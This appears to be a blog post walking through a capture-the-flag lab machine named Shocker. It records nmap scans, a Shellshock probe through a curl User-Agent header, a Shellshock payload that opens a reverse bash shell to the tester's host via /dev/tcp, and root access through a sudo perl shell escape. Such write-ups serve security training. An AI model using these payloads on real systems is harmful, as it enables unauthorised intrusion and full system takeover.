nmap -sT 10.129.50.112
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-24 00:14 CDT
Nmap scan report for 10.129.50.112
Host is up (0.067s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
find / -name "raft-large-files-lowercase.txt" 2>/dev/null
/usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt
nmap -sC -sV 10.129.50.112
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-24 00:52 CDT
Nmap scan report for 10.129.50.112
Host is up (0.069s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.51 seconds
[interesting point]
OpenSSH 7.2p2 Ubuntu 4ubuntu2.2
curl -H "User-Agent: () { :; }; echo; echo Vulnerable" http://10.129.50.112/cgi-bin/user.sh
Vulnerable
Content-Type: text/plain
Just an uptime test script
02:38:04 up 1:27, 0 users, load average: 0.00, 0.00, 0.00
this indicates that the server at `http://10.129.50.112/cgi-bin/user.sh` is vulnerable to the Shellshock (Bashdoor) vulnerability. Here's what you should know and the steps you can follow next:
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.88/5678 0>&1" http://10.129.50.112/cgi-bin/user.sh
=> almost exactly getting me the shell into the system
nc -lvnp 5678
listening on [any] 5678 ...
connect to [10.10.14.88] from (UNKNOWN) [10.129.50.112] 58662
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ ls
ls
user.sh
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
shelly@Shocker:/usr/lib/cgi-bin$ cd /home
cd /home
shelly@Shocker:/home$ ls
ls
shelly
shelly@Shocker:/home$ cd shelly
cd shelly
shelly@Shocker:/home/shelly$ ls
ls
user.txt
shelly@Shocker:/home/shelly$ cat user.txt
cat user.txt
cfd286...
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/home/shelly$ perl -e 'exec "/bin/sh";'
perl -e 'exec "/bin/sh";'
ls
user.txt
cd /root
/bin/sh: 2: cd: can't cd to /root
ls
user.txt
sudo perl -e 'exec "/bin/sh";'
whoami
root
cd /root
ls
root.txt
cat root.txt
90d8a390...
'호그와트' 카테고리의 다른 글
| 판다의 고기는 원래 맛있다 (0) | 2024.07.26 |
|---|---|
| Why did CrowdStrike IT outage happen ? (brief summary) (0) | 2024.07.24 |
| AI 네트워크 방어 게임 (Cyber Shield) 4 by A to Z 영웅 (사이드 사이드 프로젝트) (0) | 2024.07.24 |
| AI 네트워크 방어 게임 (Cyber Shield) 3 by A to Z 영웅 (사이드 사이드 프로젝트) (0) | 2024.07.24 |
| AI 네트워크 방어 게임 (Cyber Shield) 2 by A to Z 영웅 (사이드 사이드 프로젝트) (0) | 2024.07.24 |